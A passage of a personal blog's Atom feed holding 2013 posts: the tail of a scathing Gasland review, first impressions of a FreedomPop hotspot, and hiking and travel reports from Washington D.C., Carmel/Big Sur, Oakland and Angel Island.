and carefully (and conservatively) looking at possibilities how to
extract resources so I would be the perfect watcher for this movie. But
the &amp;quot;journalist&amp;quot; (aka the weird dude that felt he had to make a movie
without any other credentials) was completely unable to convince us of
his story.&lt;/p&gt;
&lt;p&gt;First of all, the investigative journalist starts with his own story of
how these evil companies are trying to buy the claim on his land to
frack natural gas out of the ground (that's where he's already saying
that we all know that all these big companies are bad and evil -
everybody fears the large unknown and what they'll do). The movie (I
would not call it a documentary) continues with him driving around for
hours (in a car, running on lots of fuel; in addition, he lives in a
typical American house with thin wood as outer walls and apparently no
insulation, so he depends on lots and lots of gas) calling up random
people who already sold their claim and were burnt by the &amp;quot;company&amp;quot; in
one way or another. These people tell us how they got sick after the
company fracked the gas out of the ground and that their water is now
bad. The &amp;quot;journalist&amp;quot; tries to convince us by showing a list of
chemicals that the companies might use but he never does an analysis of
the water that these people drink. All in all it looks like all those
hillbillies who fight against mobile antennas because of the bad
electromagnetic fields that disturb your brain patterns (yeah, right).
At one point (shortly before we stopped watching) he went to a family
that claimed they can set their water on fire. He talked about it for a
couple of minutes but never showed it, only saying that it &amp;quot;could&amp;quot; work.&lt;/p&gt;
&lt;p&gt;In summary, the movie consists of a weird guy living in
the woods who feels threatened by big companies that might or might not
do evil stuff; the movie does not help with this decision. He drives
around and talks to other dropouts about how they feel about the drilling
companies as new neighbors (remember, many of them got huge lumps of
money for selling the drilling claims on their land). We learn that
they feel concerned and that there might or might not be a problem with
the water. If Gasland were a movie I would rate it 3/10 due to the
bad plot; but as it wants to be a documentary about fracking and
completely fails to do even basic research, only asking suggestive
questions (&amp;quot;do you think that the water is bad?&amp;quot; &amp;quot;yes&amp;quot; &amp;quot;do you think the
water made you sick?&amp;quot; &amp;quot;yes&amp;quot; &amp;quot;do you think the big companies are trying
to extract all the money they can and hurt your health?&amp;quot; &amp;quot;yes&amp;quot;), I can
only give it 1/10 as a documentary. The only good thing about the
movie was the occasional nature shot that looked nice.&lt;/p&gt;
</content><category term="Random"></category><category term="bad movies"></category><category term="rant"></category></entry><entry><title>FreedomPop Overdrive: first thoughts</title><link href="/blog/2013/0508-freedompop-overdrive-first-thoughts.html" rel="alternate"></link><published>2013-05-08T05:38:00-04:00</published><updated>2013-05-08T05:38:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-05-08:/blog/2013/0508-freedompop-overdrive-first-thoughts.html</id><summary type="html">&lt;p&gt;Roughly two weeks ago I received an email that stated that &lt;a class="reference external" href="https://www.freedompop.com/"&gt;FreedomPop&lt;/a&gt;
coverage is now available in my area. I've been curious about this
company for a while as they offer &amp;quot;free&amp;quot; internet access using several
3G/4G devices. Until recently they only offered 4G connectivity using
the ClearWire 4G …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Roughly two weeks ago I received an email that stated that &lt;a class="reference external" href="https://www.freedompop.com/"&gt;FreedomPop&lt;/a&gt;
coverage is now available in my area. I've been curious about this
company for a while as they offer &amp;quot;free&amp;quot; internet access using several
3G/4G devices. Until recently they only offered 4G connectivity using
the ClearWire 4G network that is only available in larger cities (and
here in the Bay Area ClearWire coverage ends roughly in Berkeley, 1 mile
short of our home). Since a couple of weeks ago (around April 2013)
FreedomPop has peered with Sprint and offers combined 3G/4G coverage.&lt;/p&gt;
&lt;p&gt;Upon receiving that email I immediately bought the device (for 39.90$
incl. shipping) and was eagerly waiting for the delivery (which in the
end took &amp;gt;10 days). The first trial month with 2GB of free data started
immediately upon buying the device, and there are only 19 days left now
that the device has finally arrived. The set-up process is a bit weird,
as FreedomPop offers a feature to find friends with whom you can
share surplus data. In addition, you get a free 50MB of data per month
for every friend that you add. Naturally there are lists on the internet
where you can find such '&lt;a class="reference external" href="http://slickdeals.net/f/5276432-FreedomPop-Friends"&gt;friends&lt;/a&gt;'. You only have to import them to
your gmail address book which in turn is forwarded to FreedomPop.
Unfortunately, when you search for friends all of them will get a spam
email from FreedomPop, as you leak your whole address book to the company.
I tried to be clever and removed all email addresses from one of my
spare gmail accounts but apparently I forgot to delete some of the
'recently used' addresses and leaked those to FreedomPop (sorry again
friends!).&lt;/p&gt;
&lt;p&gt;When the device finally arrived I was very eager to get the service up
and running. The setup is a bit complicated as you have to start up the
WiFi hotspot first and wait until it is able to connect to at least a 3G
network. With a quick double-tap on the power button you can display the
SSID and the temporary password on the device's screen (it's not 12345
or password as a quick glimpse through the quickstart guide might
suggest). When logging in you can then switch to the admin mode using
'password' and I had to execute both &amp;quot;Update 3G PRL&amp;quot; and &amp;quot;Update 3G
Profile&amp;quot; until the Overdrive was able to connect to 3G. Before the
update the device only showed an &amp;quot;Error 67, can not connect to 3G&amp;quot; error
message.&lt;/p&gt;
&lt;p&gt;Since the update the hotspot has been running flawlessly and a quick
speed test shows 0.51Mbps down and 0.39Mbps up which is not too bad for
3G at 10pm. Now fingers crossed for my next conference trip or business
trip to hotels where WiFi costs like 20$ per day.&lt;/p&gt;
</content><category term="Random"></category><category term="freedompop"></category><category term="4g"></category><category term="gadget"></category><category term="3g"></category></entry><entry><title>Visiting the capital of the United States: Washington</title><link href="/blog/2013/0415-visiting-the-capital-of-the-united-states-washington.html" rel="alternate"></link><published>2013-04-15T21:51:00-04:00</published><updated>2013-04-15T21:51:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-04-15:/blog/2013/0415-visiting-the-capital-of-the-united-states-washington.html</id><summary type="html">&lt;p&gt;Last weekend Lumi and I traveled to Washington D.C. to explore the
capital of the United States. We drove to SFO, parked our car with
&lt;a class="reference external" href="http://www.parksfo.com/"&gt;ParkSFO&lt;/a&gt;, a fairly cheap service with regular shuttles to the
terminals, and flew to Washington Dulles. As we arrived very late we
just took …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Last weekend Lumi and I traveled to Washington D.C. to explore the
capital of the United States. We drove to SFO, parked our car with
&lt;a class="reference external" href="http://www.parksfo.com/"&gt;ParkSFO&lt;/a&gt;, a fairly cheap service with regular shuttles to the
terminals, and flew to Washington Dulles. As we arrived very late we
just took a cab to our hotel, the &lt;a class="reference external" href="https://www.marriott.com/hotels/travel/wasag-the-westin-arlington-gateway/"&gt;Westin&lt;/a&gt; in Arlington, where we
crashed and slept for a couple of hours.&lt;/p&gt;
&lt;p&gt;On Friday I had to get up early for a (super secret) kick-off meeting of
a new grant (that will be announced in a couple of days); so I spent all
day in a meeting room inside chatting with other researchers while Lumi
was exploring the big city, the capitol, the white house, and the
national mall. On the plus side, we were able to expense the hotel for
our weekend in Washington. Lumi explored the capitol and the library,
both of which I had already seen on an earlier visit when I stopped
in Washington for a couple of days after a conference in Austin, Texas
(ISPASS'11 if you are interested), so I did not feel the need to wait in
line for a long time to see the capitol again. At night we reunited in
the hotel and explored the gym (so-so, just a couple of treadmills and
some weights) and enjoyed the pool and the hot tub before we headed off
for dinner.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2013/0415/DSCF4903.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;The White House.&lt;/p&gt;
&lt;p&gt;On Saturday we started our day with a Starbucks coffee and headed to the
national mall where we spent a couple of hours to explore the &lt;a class="reference external" href="http://airandspace.si.edu/"&gt;Air and
Space museum&lt;/a&gt; (my favorite museum in Washington).&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2013/0415/DSCF4906.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Lumi in front of the Breitling Orbiter, the first balloon to fly around
the world.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2013/0415/DSCF4909.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;A picture of the X1, the first plane to fly faster than the speed of
sound.&lt;/p&gt;
&lt;p&gt;We actually planned to spend only a short amount of time in the museum
but we got hooked during the awesome tour and spent almost 4 hours in
the museum before we explored the national mall and had a good look at
the Washington monument and the Lincoln memorial before we walked
through Georgetown with all the small shops and pubs. Georgetown
felt almost like England.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2013/0415/DSCF4915.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Looking towards the Lincoln memorial.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image4" src="/blog/static/2013/0415/DSCF4917.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;The Washington monument all wrapped up.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image5" src="/blog/static/2013/0415/DSCF4919.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Lincoln calmly watching the people around him.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image6" src="/blog/static/2013/0415/DSCF4924.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Lumi in Georgetown trying to look like a pillar.&lt;/p&gt;
&lt;p&gt;On our last day we again returned to the national mall after yet another
good-morning coffee and first went to the Jefferson memorial at the
shore of Tidal basin. We enjoyed the view of all the cherry trees that
were currently in bloom and stopped over for lunch at the &lt;a class="reference external" href="http://www.nationalcherryblossomfestival.org/"&gt;cherry
blossom festival&lt;/a&gt;. Returning to the mall we quickly browsed through the
&lt;a class="reference external" href="http://americanhistory.si.edu/"&gt;national museum of American history&lt;/a&gt;. We felt that the museum was
lacking a general theme and a 'red thread' that leads visitors through
the exhibits so we just wandered aimlessly through the different rooms,
watched the original star spangled banner and headed on towards the
&lt;a class="reference external" href="http://www.mnh.si.edu/"&gt;national museum of natural history&lt;/a&gt;&amp;nbsp;where we were amazed by the
different mammals and dinosaurs they showed.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image7" src="/blog/static/2013/0415/DSCF4933.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Cherry blossoms for Lumi.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image8" src="/blog/static/2013/0415/DSCF4934.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Cherry blossoms for Mathias.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image9" src="/blog/static/2013/0415/DSCF4939.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;The Jefferson memorial.&lt;/p&gt;
&lt;p&gt;At the end of the day we returned to our hotel to grab our bags and
headed back to the airport. On the way back United managed to be 1 hour
late on a 5 hour flight due to congestion at SFO, which was a
bit annoying, especially since we were already departing at 11:40pm
(2:40am Washington time). But Lumi drove us safely home and we got a
good night's rest. All in all, Washington is an amazing city with
lots to show, from scientific museums for engineers as well as for
the other sciences, through cultural and historic exhibits, to streets
that make you feel as if you are in England.&lt;/p&gt;
</content><category term="Leisure"></category><category term="Washington"></category><category term="GeoCache"></category><category term="city trip"></category><category term="view"></category></entry><entry><title>A couple of days in Carmel and Big Sur</title><link href="/blog/2013/0407-a-couple-of-days-in-carmel-and-big-sur.html" rel="alternate"></link><published>2013-04-07T05:16:00-04:00</published><updated>2013-04-07T05:16:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-04-07:/blog/2013/0407-a-couple-of-days-in-carmel-and-big-sur.html</id><summary type="html">&lt;p&gt;To relax after some months of hard working and paper grinding Lumi and I
decided to head down to Big Sur and Carmel for some days of relaxing,
hiking, and nature watching to reload our batteries. We started off on a
lazy Wednesday and drove the 130 miles down to …&lt;/p&gt;</summary><content type="html">&lt;p&gt;To relax after some months of hard working and paper grinding Lumi and I
decided to head down to Big Sur and Carmel for some days of relaxing,
hiking, and nature watching to reload our batteries. We started off on a
lazy Wednesday and drove the 130 miles down to Carmel. Shortly before
our destination we took a break, bought some food, and enjoyed ourselves
at the beach for an hour or two. The sand was very fine-grained, the sun
was shining, but the water was way too cold for swimming (hey, we are
still in northern California!). After our lunch we continued to Carmel
where we checked into our lovely hotel: &lt;a class="reference external" href="http://hofsashouse.com/"&gt;Hofsas house&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4817.JPG"&gt;&lt;img alt="image0" src="/blog/static/2013/0407/DSCF4817.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;You can't say no to this lunch place.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4814.JPG"&gt;&lt;img alt="image1" src="/blog/static/2013/0407/DSCF4814.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Lumi likes it too&lt;/p&gt;
&lt;p&gt;For a change we were (for Swiss people) completely unprepared. We only
brought all our hiking equipment, walking gear, GeoCaching equipment,
and clothes for the 5 days that we would spend here in the Big
Sur/Carmel area. We quickly skimmed the maps and saw that there are
hiking paths but did not decide on anything.
During the check-in the nice lady at the front desk told us about
different hiking opportunities in the area, restaurants we had to check
out in Carmel, and she also told us that we should head to Point Lobos
as a teaser for what we'll see in the next couple of days.
The following map shows how little of the area we were actually able to
explore in these 5 days (I do not have a GPS log of Point Lobos and
Carmel but both can easily be explored without any GPS devices).
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20130403-Carmel.kml"&gt;View 1st Map&lt;/a&gt;&lt;/p&gt;
&lt;div class="section" id="point-lobos-wednesday"&gt;
&lt;h2&gt;Point Lobos (Wednesday)&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="http://www.parks.ca.gov/?page_id=571"&gt;Point Lobos&lt;/a&gt; is a state natural reserve directly at the pacific. The
views are amazing and you can watch sea lions laying lazily in the shore
while birds fly around them. The park features several short loops that
you can walk. For us the park felt like one of the typical American
parks where you can drive your car right to each short loop, walk for
15-30 minutes and head back to the car to get out of the park or to the
next little loop. We really stretched our time in the park and did
almost all the loops - we were especially amazed by Devil's cauldron.
All in all we hiked for roughly 3 hours and walked most of the trails
that are available. Pack your sweater as it can be really chilly -
especially when you are no longer protected by the woods. Park entrance
is 10$ per car and you get a great map.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4818.JPG"&gt;&lt;img alt="image2" src="/blog/static/2013/0407/DSCF4818.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Devil's cauldron from above.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4828.JPG"&gt;&lt;img alt="image3" src="/blog/static/2013/0407/DSCF4828.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The soup is simmering.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4829.JPG"&gt;&lt;img alt="image4" src="/blog/static/2013/0407/DSCF4829.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Beautiful flowers.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4830.JPG"&gt;&lt;img alt="image5" src="/blog/static/2013/0407/DSCF4830.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Beaches that invite you to a (refreshing) swim.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4838.JPG"&gt;&lt;img alt="image6" src="/blog/static/2013/0407/DSCF4838.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Wildlife as well.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="big-sur-loop-thursday"&gt;
&lt;h2&gt;Big Sur loop (Thursday)&lt;/h2&gt;
&lt;p&gt;On the next day we headed to &lt;a class="reference external" href="http://bigsurcalifornia.org/"&gt;Big Sur&lt;/a&gt; national park. On the 23 mile
drive to the ranger station we stopped at the big bridge to take a
couple of pictures (especially as we stopped here 3 years ago on our
&lt;a class="reference external" href="http://www.greentortoise.com/"&gt;Green Tortoise&lt;/a&gt; trip). When we arrived at the Big Sur ranger station
(day parking is 5$) we asked the ranger for a roughly 10 mile hike and
he told us that we should do the short loop. We were a bit surprised
that there were no maps, and neither did my Garmin GPS have the hiking
trails in its internal map; as an additional "plus", the cell phone had no
reception either. So we headed off and just trusted our luck. The trail
was amazing and we enjoyed the 7 mile hike to one of the base camps
where we turned right to follow our loop. On a steep incline we met two
fellow hikers that were apparently lost in the mountains. They had a
(very bad and coarse-grained) map and no idea where they were heading.
We told them their location and they joined our party on the way back to
the ranger station.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4841.JPG"&gt;&lt;img alt="image7" src="/blog/static/2013/0407/DSCF4841.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The famous bridge in Big Sur.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4845.JPG"&gt;&lt;img alt="image8" src="/blog/static/2013/0407/DSCF4845.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Our lunch place half-way through the hike.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4849.JPG"&gt;&lt;img alt="image9" src="/blog/static/2013/0407/DSCF4849.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;These redwoods are tall.&lt;/p&gt;
&lt;p&gt;The loop was amazing even though we did not see the Pacific due to a
light drizzle and lots of fog. When we returned to the ranger station we
were quite exhausted: the 12 mile loop that the ranger told us about
turned out to be a 14 mile loop with quite a bit of elevation gain. We were
quite happy that we made it and really enjoyed the sauna back at our
hotel. We quickly ate some dinner and dropped into our beds for a good
night's rest!
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20130404-Big_Sur.kml"&gt;View 2nd Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="jacks-peak-county-park-and-carmel-beach-friday"&gt;
&lt;h2&gt;Jacks peak county park and Carmel beach (Friday)&lt;/h2&gt;
&lt;p&gt;Today was a day to relax and to regain some power in our legs. After
breakfast we headed towards &lt;a class="reference external" href="http://www.co.monterey.ca.us/parks/jackspeak.html"&gt;Jacks peak county park&lt;/a&gt; where we went off
for a couple of light loops around the small park. We enjoyed the nice
views and the short distances between the trails. As part of our hike we
also searched for some GeoCaches so that we can keep up with my parents.
After returning to our hotel we enjoyed the pool, the sauna, and went
searching for some more GeoCaches in beautiful Carmel. The beach was
amazing and we enjoyed a breathtaking sunset at the beach before heading
to a very tasty Japanese restaurant (&lt;a class="reference external" href="http://www.yelp.com/biz/sushi-heaven-carmel-by-the-sea"&gt;Sushi Heaven&lt;/a&gt;).
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20130405-Jacks_Peak.kml"&gt;View 3rd Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="garland-ranch-regional-park-saturday"&gt;
&lt;h2&gt;Garland ranch regional park (Saturday)&lt;/h2&gt;
&lt;p&gt;After we relaxed a bit on Friday we were ready for another longer hike
in &lt;a class="reference external" href="http://www.mprpd.org/index.cfm/id/19/Garland-Ranch-Regional-Park/"&gt;Garland ranch regional park&lt;/a&gt;. We started at around 10:30am and
arrived in the park by 11am. There is abundant parking at the trailhead
and a&amp;nbsp;knowledgeable&amp;nbsp;ranger at the visitor center informed us about the
different trails. We bought a map and set off to explore the park.
First, we headed straight up to the peak and enjoyed a break on Siesta
point before going to the top. Instead of going back towards west as the
ranger told us we turned east and headed back on a meandering trail.
Apparently the trail is no longer open (although it's still on the map)
and we had to sneak by a couple of houses. In addition, a bridge was
missing and I had to carry Lumi across a little stream with cold cold
water. We had to head back to the highway and sneak back into the park
but we finally made it back and lifted a couple more caches before we
headed out. All in all we finished a 10.5 mile (16.7km) loop and we
really enjoyed ourselves. Getting lost was actually a huge advantage: we
strolled along paths that had not been used for years, walked
through long-lost meadows, and felt like we were on a huge
adventure.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4864.JPG"&gt;&lt;img alt="image10" src="/blog/static/2013/0407/DSCF4864.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Near our second GeoCache of the hike.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4866.JPG"&gt;&lt;img alt="image11" src="/blog/static/2013/0407/DSCF4866.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Snakes on our trail.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4870.JPG"&gt;&lt;img alt="image12" src="/blog/static/2013/0407/DSCF4870.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;View from above.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4872.JPG"&gt;&lt;img alt="image13" src="/blog/static/2013/0407/DSCF4872.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Yes, we started down there.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4873.JPG"&gt;&lt;img alt="image14" src="/blog/static/2013/0407/DSCF4873.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Path through the cursed forest.&lt;/p&gt;
&lt;p&gt;Back in Carmel we again enjoyed the sauna (there's nothing better after
a day of hiking) and returned to our Japanese chef of choice. Ah, what a
great relaxing day.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20130406-Garland_Ranch.kml"&gt;View 4th Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="carmel-beach-and-returning-home-sunday"&gt;
&lt;h2&gt;Carmel beach and returning home (Sunday)&lt;/h2&gt;
&lt;p&gt;On our last day we decided to stroll once more through beautiful Carmel
and relax a bit on the beach before we had to return home to
Albany. In general I can say that we enjoyed our short holidays and we
had an active recovery where we hiked a lot, talked a lot, had great and
amazing food, and just an awesome time together!&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0407/DSCF4876s.JPG"&gt;&lt;img alt="image15" src="/blog/static/2013/0407/DSCF4876s.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="redwood"></category><category term="day hike"></category><category term="GeoCache"></category><category term="swimming"></category><category term="long day hike"></category><category term="beach"></category><category term="side quest"></category><category term="view"></category><category term="strenuous"></category></entry><entry><title>Joaquin Miller park</title><link href="/blog/2013/0330-joaquin-miller-park.html" rel="alternate"></link><published>2013-03-30T20:28:00-04:00</published><updated>2013-03-30T20:28:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-03-30:/blog/2013/0330-joaquin-miller-park.html</id><summary type="html">&lt;p&gt;For today's hike we went to &lt;a class="reference external" href="http://www.oaklandparks.com/"&gt;Joaquin Miller park&lt;/a&gt; in Oakland. The park
is about 30min drive from our home and on the way to the park we
collected a couple of friends who joined us on today's excursion. The
park features nice views of Oakland and the bay and …&lt;/p&gt;</summary><content type="html">&lt;p&gt;For today's hike we went to &lt;a class="reference external" href="http://www.oaklandparks.com/"&gt;Joaquin Miller park&lt;/a&gt; in Oakland. The park
is about 30min drive from our home and on the way to the park we
collected a couple of friends who joined us on today's excursion. The
park features nice views of Oakland and the bay and is one of the few
'city' parks where you can stroll into a Redwood grove.&lt;/p&gt;
&lt;div class="section" id="navigation"&gt;
&lt;h2&gt;Navigation&lt;/h2&gt;
&lt;p&gt;The park is easy to reach; we parked at the ranger station at Sanborn
Drive (parking is free). Unfortunately there were no maps available and
we had to rely solely on my GPS and our smartphones. If you want to
explore this park you should plan a little ahead and check out the
different trails in this park. We did not really plan and asked a ranger
which trails are interesting and he recommended the Sunset Trail and the
West Ridge Trail.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hike-description"&gt;
&lt;h2&gt;Hike description&lt;/h2&gt;
&lt;p&gt;All in all it was an easy half-day hike of 4.9 miles (7.9km) that was
perfect for us and our friends. We used the time to stroll and chat a
lot. During the hike we enjoyed the mixture between views of the Oakland
urban area and the Redwood trees and deep forest vegetation. The
most&amp;nbsp;strenuous&amp;nbsp;part was when we were trying to short-cut our way to a
cache and had to climb over a little hill (straight up on one side and
down on the other).&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2013/0330/130330-height_profile.png" /&gt;&lt;/p&gt;
&lt;p&gt;Height profile of our hike.&lt;/p&gt;
&lt;p&gt;The hike was not too long and we had plenty of time to relax in between.
There are nice picnic areas in the Redwoods and you can enjoy your lunch
whilst looking at the wildlife and vegetation around you.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20130330-Joaquin_Miller_Park.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="picture-time"&gt;
&lt;h2&gt;Picture time&lt;/h2&gt;
&lt;p&gt;Fortunately Doris took a bunch of pictures:&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2013/0330/58942_10151514200254264_2125402006_n.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;On the top of the hill.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2013/0330/60645_10151514201439264_52255123_n.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Inside the Redwood grove.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2013/0330/150152_10151514201199264_1454116676_n.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Lunch in the grove and in the sun.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image4" src="/blog/static/2013/0330/2512_10151514202429264_1280468714_n.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Looking for GeoCaches.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image5" src="/blog/static/2013/0330/543710_10151514199519264_1702840987_n.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Water break.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image6" src="/blog/static/2013/0330/580359_10151514200559264_839074719_n.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;This cache is well hidden!&lt;/p&gt;
&lt;p&gt;&lt;img alt="image7" src="/blog/static/2013/0330/523655_10151514200704264_231175373_n.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;One of the more devious cache hideouts!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;The Joaquin Miller park is what I would call a nice picnic park. There
are many short trails that you can use to explore the forest while you
are still close to a picnic area all the time. Children can play
hide-and-seek or other games on the soft forest ground while grown-ups
can use some of the trails for biking as well.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="redwood"></category><category term="easy hike"></category><category term="GeoCache"></category><category term="side quest"></category><category term="view"></category></entry><entry><title>Angel Island</title><link href="/blog/2013/0323-angel-island.html" rel="alternate"></link><published>2013-03-23T20:14:00-04:00</published><updated>2013-03-23T20:14:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-03-23:/blog/2013/0323-angel-island.html</id><summary type="html">&lt;p&gt;&lt;a class="reference external" href="http://angelisland.org/"&gt;Angel Island&lt;/a&gt; is a multi-purpose island that is right in the middle of
the bay and&amp;nbsp;surrounded&amp;nbsp;by the three big bridges: Golden Gate bridge, Bay
bridge, and Richmond bridge. Over the years the island was used for a
whole bunch of things, including a hunting ground for native Americans …&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;a class="reference external" href="http://angelisland.org/"&gt;Angel Island&lt;/a&gt; is a multi-purpose island that is right in the middle of
the bay and&amp;nbsp;surrounded&amp;nbsp;by the three big bridges: Golden Gate bridge, Bay
bridge, and Richmond bridge. Over the years the island was used for a
whole bunch of things, including a hunting ground for native Americans,
a quarantine station for people immigrating to the US, an Army station,
and last but not least Angel Island turned into a national park.&lt;/p&gt;
&lt;div class="section" id="navigation"&gt;
&lt;h2&gt;Navigation&lt;/h2&gt;
&lt;p&gt;Angel Island is serviced by different ferries: from Oakland, from San
Francisco, and from Tiburon. Tiburon is the closest port and just a
stone's throw from Angel Island. In the morning we drove to Tiburon and
parked our car near the CVS/pharmacy parking lot (5$/day, the parking
close to the ferry is ~20$/day).
Please check the ferry schedule before you head to Tiburon and make sure
that you add some safety margin as traffic might be slow towards
Tiburon. The ferry is 13.50$ per person.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hike-description"&gt;
&lt;h2&gt;Hike description&lt;/h2&gt;
&lt;p&gt;The ferry ride from Tiburon to Angel Island is short but very scenic
with amazing views of the San Francisco skyline and the Angel Island
wild life. We dropped off the ferry at the Ayala cove and started
climbing up the North ridge trail until we reached the fire road. The
fire road is a broad road that continues around the island. After
following the fire road for a bit we followed the Sunset trail up to the
Summit of Mount Livermore.
Depending on which side of the island you are on, you are rewarded with
awesome views of Tiburon and the back country, the Golden Gate bridge,
the San Francisco skyline, Alcatraz, the Bay bridge, Yerba Buena and
Treasure Island, Oakland, or the Richmond bridge. On the top of the hill
you only have to turn around to switch between these views.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2013/0323/heightprofile.png" /&gt;&lt;/p&gt;
